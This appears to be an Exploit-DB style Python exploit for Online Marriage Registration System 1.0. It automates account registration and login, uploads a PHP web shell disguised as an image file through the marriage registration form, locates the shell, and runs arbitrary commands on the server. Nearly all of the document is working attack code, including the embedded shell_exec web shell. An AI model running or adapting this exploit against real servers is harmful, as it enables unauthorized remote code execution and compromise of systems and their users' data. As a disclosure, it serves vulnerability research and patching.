Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)

# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
# Date: 10/02/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Xampp Server and Wamp Server
# Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows. Adding the possibility of automatic registration and execution of any command without needing to upload any local file
# Example with registration:    python3 script.py -u http://172.16.1.102:80/ -c 'whoami' 
# Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123 

import os
import sys
import random
import argparse
import requests


def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, action='store', help='Url of Online Marriage Registration System (OMRS) 1.0')
    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
    parser.add_argument('-m', '--mobile', required=False, action='store', help='Mobile phone used for registration')
    parser.add_argument('-p', '--password', required=False, action='store', help='Password used for registration')
    my_args = parser.parse_args()
    return my_args


def login(url, mobile, password):
    url = "%s/user/login.php"%(url)
    payload = {'mobno':mobile, 'password':password, 'login':''}
    req = requests.post(url, data=payload)
    return req.cookies['PHPSESSID']


def upload(url, cookie, file=None):
    url = "%s/user/marriage-reg-form.php"%url
    files = {'husimage': ('shell.php', "<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>", 'application/x-php', {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
    payload = {'dom':'05/01/2020','nofhusband':'omrs_rce', 'hreligion':'omrs_rce', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'omrs_rce','hzipcode':'omrs_rce','hstate':'omrs_rce','hadharno':'omrs_rce','nofwife':'omrs_rce','wreligion':'omrs_rce','wsbmarriage':'Bachelor','waddress':'omrs_rce','wzipcode':'omrs_rce','wstate':'omrs_rce','wadharno':'omrs_rce','witnessnamef':'omrs_rce','waddressfirst':'omrs_rce','witnessnames':'omrs_rce','waddresssec':'omrs_rce','witnessnamet':'omrs_rce','waddressthird':'omrs_rce','submit':''}
    req = requests.post(url, data=payload, cookies={'PHPSESSID':cookie}, files=files)
    print('[+] PHP shell uploaded')


def get_remote_php_files(url):
    url = "%s/user/images"%(url)
    req = requests.get(url)
    php_files = []
    for i in req.text.split(".php"):
        php_files.append(i[-42:])
    return php_files


def exec_command(url, webshell, command):
    url_r = "%s/user/images/%s?cmd=%s"%(url, webshell, command)
    req = requests.get(url_r)
    print("[+] Command output\n%s"%(req.text))


def register(mobile, password, url):
    url_r = "%s/user/signup.php"%(url)
    data = {"fname":"omrs_rce", "lname":"omrs_rce", "mobno":mobile, "address":"omrs_rce", "password":password, "submit":""}
    req = requests.post(url_r, data=data)
    print("[+] Registered with mobile phone %s and password '%s'"%(mobile,password))


if __name__ == "__main__":
    args = get_args()
    url = args.url
    command = args.command
    mobile = str(random.randint(100000000,999999999)) if args.mobile is None else args.mobile
    password = "dante123" if args.password is None else args.password
    if args.password is None or args.mobile is None:
        register(mobile,password,url)
    cookie = login(url, mobile, password)
    initial_php_files = get_remote_php_files(url)
    upload(url, cookie)
    final_php_files = get_remote_php_files(url)
    webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php")
    exec_command(url,webshell,command)